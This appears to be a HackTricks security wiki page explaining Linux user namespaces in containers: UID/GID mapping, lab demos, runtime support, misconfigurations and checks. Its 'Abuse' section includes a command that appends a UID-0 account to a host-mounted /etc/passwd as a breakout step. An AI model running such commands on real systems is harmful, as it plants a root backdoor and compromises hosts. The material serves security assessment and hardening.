user-namespace.md (9732B)
1 --- 2 title: "User Namespace" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/user-namespace.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/user-namespace.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # User Namespace 14 15 ## Overview 16 17 The user namespace changes the meaning of user and group IDs by letting the kernel map IDs seen inside the namespace to different IDs outside it. This is one of the most important modern container protections because it directly addresses the biggest historical problem in classic containers: **root inside the container used to be uncomfortably close to root on the host**. <sup>[[1]](#references)</sup> 18 19 With user namespaces, a process may run as UID 0 inside the container and still correspond to an unprivileged UID range on the host. That means the process can behave like root for many in-container tasks while being much less powerful from the host's point of view. This does not solve every container security problem, but it changes the consequences of a container compromise significantly. 20 21 ## Operation 22 23 A user namespace has mapping files such as `/proc/self/uid_map` and `/proc/self/gid_map` that describe how namespace IDs translate to parent IDs. If root inside the namespace maps to an unprivileged host UID, then operations that would require real host root simply do not carry the same weight. This is why user namespaces are central to **rootless containers** and why they are one of the biggest differences between older rootful container defaults and more modern least-privilege designs. <sup>[[1]](#references)</sup> 24 25 The point is subtle but crucial: root inside the container is not eliminated, it is **translated**. The process still experiences a root-like environment locally, but the host should not be treating it as full root. 26 27 ## Lab 28 29 A manual test is: 30 31 ```bash 32 unshare --user --map-root-user --fork bash 33 id 34 cat /proc/self/uid_map 35 cat /proc/self/gid_map 36 ``` 37 38 This makes the current user appear as root inside the namespace while still not being host root outside it. It is one of the best simple demos for understanding why user namespaces are so valuable. 39 40 In containers, you can compare the visible mapping with: 41 42 ```bash 43 docker run --rm debian:stable-slim sh -c 'id && cat /proc/self/uid_map' 44 ``` 45 46 The exact output depends on whether the engine is using user namespace remapping or a more traditional rootful configuration. 47 48 You can also read the mapping from the host side with: 49 50 ```bash 51 cat /proc/<pid>/uid_map 52 cat /proc/<pid>/gid_map 53 ``` 54 55 ## Runtime Usage 56 57 Rootless Podman is one of the clearest examples of user namespaces being treated as a first-class security mechanism. Rootless Docker also depends on them. Docker's `userns-remap` support improves safety in rootful daemon deployments too, although many deployments leave it disabled for compatibility reasons. Kubernetes can create a user namespace for a Pod when `hostUsers: false` is supported and enabled, but adoption and defaults still vary by runtime, distribution, and cluster policy. Incus and LXC systems also rely heavily on UID/GID shifting and id-mapping concepts. <sup>[[2]](#references)</sup> <sup>[[3]](#references)</sup> <sup>[[4]](#references)</sup> 58 59 The general trend is clear: environments that use user namespaces seriously usually provide a better answer to "what does container root actually mean?" than environments that do not. 60 61 ## Advanced Mapping Details 62 63 When an unprivileged process writes to `uid_map` or `gid_map`, the kernel applies stricter rules than it does for a privileged parent namespace writer. Only limited mappings are allowed, and for `gid_map` the writer usually needs to disable `setgroups(2)` first: 64 65 ```bash 66 cat /proc/self/setgroups 67 echo deny > /proc/self/setgroups 68 ``` 69 70 This detail matters because it explains why user-namespace setup sometimes fails in rootless experiments and why runtimes need careful helper logic around UID/GID delegation. 71 72 Another advanced feature is the **ID-mapped mount**. Instead of changing on-disk ownership, an ID-mapped mount applies a user-namespace mapping to a mount so that ownership appears translated through that mount view. This is especially relevant in rootless and modern runtime setups because it allows shared host paths to be used without recursive `chown` operations. Security-wise, the feature changes how writable a bind mount appears from inside the namespace, even though it does not rewrite the underlying filesystem metadata. 73 74 Finally, remember that when a process creates or enters a new user namespace, it receives a full capability set **inside that namespace**. That does not mean it suddenly gained host-global power. It means those capabilities can be used only where the namespace model and other protections allow them. This is the reason `unshare -U` can suddenly make mounting or namespace-local privileged operations possible without directly making the host root boundary disappear. 75 76 ## Misconfigurations 77 78 The major weakness is simply not using user namespaces in environments where they would be feasible. If container root maps too directly to host root, writable host mounts and privileged kernel operations become much more dangerous. Another problem is forcing host user namespace sharing or disabling remapping for compatibility without recognizing how much that changes the trust boundary. 79 80 User namespaces also need to be considered together with the rest of the model. Even when they are active, a broad runtime API exposure or a very weak runtime configuration can still allow privilege escalation through other paths. But without them, many old breakout classes become much easier to exploit. 81 82 ## Abuse 83 84 If the container is rootful without user namespace separation, a writable host bind mount becomes vastly more dangerous because the process may really be writing as host root. Dangerous capabilities likewise become more meaningful. The attacker no longer needs to fight as hard against the translation boundary because the translation boundary barely exists. 85 86 User namespace presence or absence should be checked early when evaluating a container breakout path. It does not answer every question, but it immediately shows whether "root in container" has direct host relevance. 87 88 The most practical abuse pattern is to confirm the mapping and then immediately test whether host-mounted content is writable with host-relevant privileges: 89 90 ```bash 91 id 92 cat /proc/self/uid_map 93 cat /proc/self/gid_map 94 touch /host/tmp/userns_test 2>/dev/null && echo "host write works" 95 ls -ln /host/tmp/userns_test 2>/dev/null 96 ``` 97 98 If the file is created as real host root, user namespace isolation is effectively absent for that path. At that point, classic host-file abuses become realistic: 99 100 ```bash 101 echo 'x:x:0:0:x:/root:/bin/bash' >> /host/etc/passwd 2>/dev/null || echo "passwd write blocked" 102 cat /host/etc/passwd | tail 103 ``` 104 105 A safer confirmation on a live assessment is to write a benign marker instead of modifying critical files: 106 107 ```bash 108 echo test > /host/root/userns_marker 2>/dev/null 109 ls -l /host/root/userns_marker 2>/dev/null 110 ``` 111 112 These checks matter because they answer the real question fast: does root in this container map closely enough to host root that a writable host mount immediately becomes a host compromise path? 113 114 ### Full Example: Regaining Namespace-Local Capabilities 115 116 If seccomp allows `unshare` and the environment permits a fresh user namespace, the process may regain a full capability set inside that new namespace: 117 118 ```bash 119 unshare -UrmCpf bash 120 grep CapEff /proc/self/status 121 mount -t tmpfs tmpfs /mnt 2>/dev/null && echo "namespace-local mount works" 122 ``` 123 124 This is not by itself a host escape. The reason it matters is that user namespaces can re-enable privileged namespace-local actions that later combine with weak mounts, vulnerable kernels, or badly exposed runtime surfaces. 125 126 ## Checks 127 128 These commands are meant to answer the most important question in this page: what does root inside this container map to on the host? 129 130 ```bash 131 readlink /proc/self/ns/user # User namespace identifier 132 id # Current UID/GID as seen inside the container 133 cat /proc/self/uid_map # UID translation to parent namespace 134 cat /proc/self/gid_map # GID translation to parent namespace 135 cat /proc/self/setgroups 2>/dev/null # GID-mapping restrictions for unprivileged writers 136 ``` 137 138 What is interesting here: 139 140 - If the process is UID 0 and the maps show a direct or very close host-root mapping, the container is much more dangerous. 141 - If root maps to an unprivileged host range, that is a much safer baseline and usually indicates real user namespace isolation. 142 - The mapping files are more valuable than `id` alone, because `id` only shows the namespace-local identity. 143 144 If the workload runs as UID 0 and the mapping shows that this corresponds closely to host root, you should interpret the rest of the container's privileges much more strictly. 145 146 ## References 147 148 - [1] [`user_namespaces(7)` - Linux manual page](https://man7.org/linux/man-pages/man7/user_namespaces.7.html) 149 - [2] [Docker Docs - Isolate containers with a user namespace](https://docs.docker.com/engine/security/userns-remap/) 150 - [3] [Kubernetes Documentation - User namespaces](https://kubernetes.io/docs/concepts/workloads/pods/user-namespaces/) 151 - [4] [Incus documentation - Security and unprivileged containers](https://linuxcontainers.org/incus/docs/main/explanation/security/)